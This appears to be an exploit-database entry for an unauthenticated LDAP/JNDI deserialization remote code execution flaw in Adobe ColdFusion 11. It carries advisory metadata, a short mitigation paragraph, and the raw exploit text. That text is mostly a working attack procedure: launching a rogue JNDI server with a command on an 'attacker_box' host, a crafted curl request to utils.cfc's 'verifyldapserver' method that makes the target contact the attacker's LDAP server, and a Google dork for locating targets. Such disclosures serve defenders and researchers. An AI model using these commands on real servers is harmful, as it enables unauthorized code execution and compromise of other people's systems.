Adobe ColdFusion 11 - LDAP Java Object Deserialization Remote Code Execution (RCE)

vendor:

Adobe ColdFusion

by:

Amel BOUZIANE-LEBLOND

7.5

CVSS

HIGH

LDAP Java Object Deserialization Remote Code Execution

CWE

Product Name: Adobe ColdFusion

Affected Version From: Adobe Coldfusion 11.0.03.292866

Affected Version To: Adobe Coldfusion 11

Patch Exists: NO

Related CWE:

CPE: a:adobe:coldfusion:11.0.03.292866

Metasploit:

Other Scripts:

Platforms Tested: Microsoft Windows Server, Linux

2022

Adobe ColdFusion 11 – LDAP Java Object Deserialization Remote Code Execution (RCE)

ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution. JNDI attack via the 'verifyldapserver' parameter on the utils.cfc.

Mitigation:

Apply the necessary security patches or updates provided by Adobe. Restrict access to the ColdFusion server from untrusted networks. Monitor network traffic for any suspicious activity.

Source

Exploit-DB raw data:

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
# Google Dork: intext:"adobe coldfusion 11"
# Date: 2022-22-02
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested on: Microsoft Windows Server & Linux

# Description:
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc

==================== 1.Setup rogue-jndi Server ====================

https://github.com/veracode-research/rogue-jndi


==================== 2.Preparing the Attack =======================

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"

==================== 3.Launch the Attack ==========================


http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json


curl -i -s -k -X $'GET' \
    -H $'Host: target' \
    --data-binary $'\x0d\x0a\x0d\x0a' \
    $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'


==================== 4.RCE =======================================

Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8 
Can be done by modify the pom.xml as below

<configuration>
<source>7</source>
<target>7</target>
</configuration>